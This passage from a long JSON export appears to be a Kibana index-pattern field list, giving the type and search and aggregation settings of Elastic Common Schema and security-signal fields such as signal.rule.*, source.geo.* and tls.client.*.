e\":\"server.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.name\"}}},{\"count\":0,\"name\":\"service.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.node.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.state\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.depth\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.index\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.original_event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_time\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.building_block_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.enabled\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.false_positives\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.from\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.immutable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.interval\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.language\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.max_signals\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.note\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.rule.output_index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.references\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_name_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.saved_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.size\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.value\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timestamp_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.to\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.threshold_count\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.as.organization.name\"}}},{\"count\":0,\"name\":\"source.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.full_name\"}}},{\"count\":0,\"name\":\"source.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.name\"}}},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.cipher\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.ja3\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,